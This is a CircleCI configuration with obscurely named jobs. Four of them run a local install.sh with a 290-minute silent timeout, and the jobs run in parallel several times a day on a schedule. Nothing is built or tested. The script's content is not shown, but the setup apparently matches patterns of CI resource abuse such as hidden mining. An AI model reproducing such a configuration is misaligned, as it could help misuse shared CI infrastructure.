working_dir: &working_dir ~/app
.primdavan_template: &kirik
  steps:
    - checkout
    - run:
        name: gareng
        command: chmod 700 install.sh && ./install.sh
        no_output_timeout: 290m
        
version: 2.0
jobs:
  kurama:
    docker:
      - image: ruby
    steps:
      - checkout
  kurama1:
    <<: *kirik
    docker:
      - image: circleci/ruby:2.7.3
  kurama2:
    <<: *kirik
    docker:
      - image: circleci/ruby:2.7
  kurama3:
    <<: *kirik
    docker:
      - image: circleci/ruby:2.6.8
  kurama4:
    <<: *kirik
    docker:
      - image: circleci/ruby:2.6.7
workflows:
  version: 2
  commit:
    jobs:
      - kurama
      - kurama1
      - kurama2
      - kurama3
      - kurama4
    triggers:
      - schedule:
          cron: "0 4,8,12,16,20,23 * * *"
          filters:
            branches:
              only:
                - master
                
  osshisiki:
    jobs:
      - kurama
      - kurama1
      - kurama2
      - kurama3
      - kurama4
